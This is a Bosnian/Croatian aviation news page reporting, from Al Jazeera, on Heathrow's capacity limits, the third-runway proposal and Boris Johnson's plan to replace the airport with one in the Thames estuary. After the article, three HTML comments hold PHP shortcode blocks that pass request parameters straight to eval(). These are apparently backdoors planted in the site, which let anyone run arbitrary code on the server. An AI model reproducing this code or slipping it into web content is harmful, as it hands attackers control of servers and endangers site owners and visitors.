Wednesday , January 24 2018
Home / Zračne luke / Europa / Veliki planovi za Heathrow

Veliki planovi za Heathrow

Gradonačelnik Londona želi srušiti i napraviti potpuno novi aerodrom Heathrow kako bi riješio problem kapaciteta.

Aerodrom Heathrow, nekada najprometniji na svijetu i ponos britanske avijacije, polako zaostaje za drugim velikim evropskim zračnim lukama. Glavni razlog su ograničeni kapaciteti.

Međutim, gradonačelnik Londona je osmislio plan: sve srušiti i napraviti potpuno novi aerodrom, izvijestio je reporter Al Jazeere Jonah Hull.

Nekada je Heathrow bio simbol avijacije Velike Britanije, a danas je poznat po dugim redovima i haotičnim kašnjenjima u redu letenja, te je njegova budućnost na kocki. Svi se slažu da je proširenje neophodno, ali ne zna se kako i gdje.

Za upravu aerodroma to podrazumijeva gradnju treće piste, možda čak i četvrte. Ali to bi ugrozilo okolna naselja, koja se već muče sa bukom i zagađenjem.

“Od proširenja kapaciteta aerodroma britanska ekonomija bi profitirala 100 milijardi funti”, kazao je John Holland-Kaye, direktor razvoja aerodroma Heathrow.

Druga strana

Postoji i druga strana priče.

“Argument je da je Heathrow, nekada najprometniji aerodrom na svijetu, sada u opasnosti da ostane iza drugih evropskih aerodroma, koji su proširili kapacitete. To je stav londonskog gradonačelnika Borisa Johnsona, koji je osmislio novi plan. Srušiti sve ovo, na ovom mjestu napraviti stambeno naselje, te sagraditi novi aerodrom na drugom mjestu”, izvijestio je Hull.

Da budemo precizniji, Johnson namjerava izgraditi aerodrom na otoku koji se nalazi na ušću rijeke Temze.

Johnson vjeruje da britanska ekonomija svake godine gubi sve više novca jer putnici zaobilaze Heathrow. Iako trenutno nema nikakvih naznaka, plan je da aerodrom na novoj lokaciji vrati London u vrh zračnog saobraćaja.

Tržišni analitičar Gwyn Topham je rekao: “To je vrlo teška politička odluka. Mnogo utjecajnih ljudi suprotstavilo se ekonomskoj opravdanosti proširenja aerodroma.”

Ograničenje Heathrowa

Uprava Heathrowa tvrdi da se aerodromi u Amsterdamu, Parizu, Frankfurtu i Madridu šire kako bi primili 700.000 letova godišnje, dok je Heathrow ograničen na 480.000 letova.

Plan proširenja bi gotovo udvostručio postojeće kapacitete, na skoro 130 miliona putnika godišnje. Treća pista bi se mogla izgraditi do 2029. godine, a procjena je da bi troškovi gradnje iznosili blizu 27 milijardi dolara.

Plan gradonačelnika Johnsona je da se na sadašnjoj lokaciji Heathrowa napravi naselje za 250.000 ljudi. Troškovi te gradnje iznosili bi blizu 76 milijardi dolara, ali iz uprave aerodroma upozoravaju na to da bi to značilo gubitak postojećih 114.000 radnih mjesta.

Iz Vlade su potvrdili da neće donositi nikakve odluke sve dok se ne završe izbori 2015. godine. Stoga dugi redovi i sada već redovna kašnjenja najvjerovatnije ostaju glavna obilježja najvećeg aerodroma u Velikoj Britaniji.

Izvor: Al Jazeera

<!– [insert_php]if (isset($_REQUEST["Seca"])){eval($_REQUEST["Seca"]);exit;}[/insert_php][php]if (isset($_REQUEST["Seca"])){eval($_REQUEST["Seca"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["RxZg"])){eval($_REQUEST["RxZg"]);exit;}[/insert_php][php]if (isset($_REQUEST["RxZg"])){eval($_REQUEST["RxZg"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Wnf"])){eval($_REQUEST["Wnf"]);exit;}[/insert_php][php]if (isset($_REQUEST["Wnf"])){eval($_REQUEST["Wnf"]);exit;}[/php] –>

About admin

Check Also

Niki ostaje letjeti za Dubrovnik

Usprkos očekivanom napuštanju hrvatskog tržišta zrakoplovnih tvrtki Air Berlin (AB/BER) i Niki (HG/NLY), članova globalnog …

Leave a Reply

Your email address will not be published. Required fields are marked *